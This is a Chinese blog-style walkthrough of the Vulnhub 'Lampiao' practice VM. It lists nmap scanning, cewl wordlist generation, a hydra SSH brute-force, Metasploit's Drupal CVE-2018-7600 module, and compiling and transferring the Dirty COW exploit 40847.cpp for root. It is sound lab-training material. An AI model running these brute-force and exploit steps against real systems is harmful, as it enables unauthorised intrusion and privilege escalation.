vulnhub - Lampiao靶场实战

admin 2022年2月27日02:42:58评论116 views字数 845阅读2分49秒阅读模式

vulnhub - Lampiao靶场实战


一、攻击IP信息收集

使用nmap 获取目标IP访问后

nmap -sP 192.168.188.0/24

vulnhub - Lampiao靶场实战

扫描服务
nmap -sS -sV -T5 -A -p- 192.168.188.128

vulnhub - Lampiao靶场实战

尝试访问80端口

vulnhub - Lampiao靶场实战

vulnhub - Lampiao靶场实战

目录爆破没有

查看1898 端口

vulnhub - Lampiao靶场实战

两个二级页面

vulnhub - Lampiao靶场实战

vulnhub - Lampiao靶场实战

根据url 规则,可能存在 2页面

vulnhub - Lampiao靶场实战

尝试访问文件

vulnhub - Lampiao靶场实战

音频 提示 user tiago

vulnhub - Lampiao靶场实战

vulnhub - Lampiao靶场实战

二维码解析内容  try harder
尝试进行目录爆破

vulnhub - Lampiao靶场实战

发现robots文件,尝试访问

vulnhub - Lampiao靶场实战

CHANGELOG.txt 发现版本信息

vulnhub - Lampiao靶场实战

网站基于drupal7 搭建

vulnhub - Lampiao靶场实战

cewl http://192.168.188.128:1898/?q=node/1 -w dayu.txt

使用cewl 基于页面信息生产密码字典

vulnhub - Lampiao靶场实战

hydra 爆破

hydra -l tiago -P dayu.txt 192.168.188.128 ssh

得到用户密码

login: tiago
password: Virgulino

vulnhub - Lampiao靶场实战

ssh登录成功,不能使用sudo su 提权

二、提权

根据已知的信息提取

vulnhub - Lampiao靶场实战

cve-2018-7600使用msf进行渗透

vulnhub - Lampiao靶场实战

查询durpal msf存在的漏洞,使用2018年的漏洞,填写配置信息

vulnhub - Lampiao靶场实战

成功进入系统,获得低权限用户,反弹shell 获取root权限

使用 dirty(脏牛)提权

vulnhub - Lampiao靶场实战

使用 searchsploit dirty 查找脏牛提权shell 利用40847.cpp

复制

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~

搭建本地服务器   把40847发送到靶机上。

vulnhub - Lampiao靶场实战

 python2 -m SimpleHTTPServer 5555  开启服务

vulnhub - Lampiao靶场实战

vulnhub - Lampiao靶场实战

vulnhub - Lampiao靶场实战

命令

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

vulnhub - Lampiao靶场实战

提权成功 获取root密码

vulnhub - Lampiao靶场实战

远程root登录成功



vulnhub - Lampiao靶场实战


2022护网溯源反制

我不是黑客--0x019

OWASP Top 10 2021

热烈庆祝路劲科技荣获 CMMI3 证书!


vulnhub - Lampiao靶场实战



原文始发于微信公众号(北京路劲科技有限公司):vulnhub - Lampiao靶场实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月27日02:42:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub - Lampiao靶场实战https://cn-sec.com/archives/804747.html

发表评论

匿名网友 填写信息